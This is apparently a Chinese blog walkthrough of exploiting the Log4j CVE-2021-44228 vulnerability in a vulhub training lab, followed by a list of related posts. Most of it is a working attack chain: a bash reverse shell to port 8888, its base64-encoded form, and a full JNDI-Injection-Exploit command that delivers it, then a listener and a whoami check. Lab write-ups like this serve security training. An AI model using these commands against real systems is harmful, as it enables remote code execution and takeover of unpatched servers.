log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

2.发现端口是8983,浏览器访问http://172.16.1.18:8983/

3.用dnslog平台检测dns回显,看看有没有漏洞存在

4.反弹shell到kali(ip为172.16.1.18)的8888端口

bash -i >& /dev/tcp/172.16.1.18/8888 0>&1

然后对上述命令进行base64编码,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=

最终 Payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.18"

同时,我们开启对172.16.1.18:8888端口监听

输入whoami命令查看是否获得shell

相关推荐
szhf7811 小时前
SpringBoot Test详解
spring boot·后端·log4j
闻哥3 天前
从测试坏味道到优雅实践:打造高质量单元测试
java·面试·单元测试·log4j·springboot
知行合一。。。3 天前
程序中的log4j、stderr、stdout日志
python·单元测试·log4j
独自破碎E3 天前
Spring Boot测试启动失败:SLF4J日志多实现冲突解决方案
spring boot·后端·log4j
niaiheni4 天前
Log4j 漏洞深度分析:CVE-2021-44228 原理与本质
web安全·网络安全·log4j
独处东汉5 天前
freertos开发空气检测仪之串口驱动与单元测试实践
单元测试·log4j
世界尽头与你5 天前
CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞
网络安全·渗透测试·log4j·apache
A懿轩A6 天前
【Maven 构建工具】Maven 生命周期完全解读:clean / default / site 三套生命周期与常用命令
java·log4j·maven
我送炭你添花9 天前
Pelco KBD300A 模拟器:19.pytest集成测试(serial + protocol + macro)
python·log4j·集成测试
我送炭你添花10 天前
Pelco KBD300A 模拟器:18. 按依赖顺序 + 复杂度由低到高逐步推进pytest单元测试
python·单元测试·log4j·pytest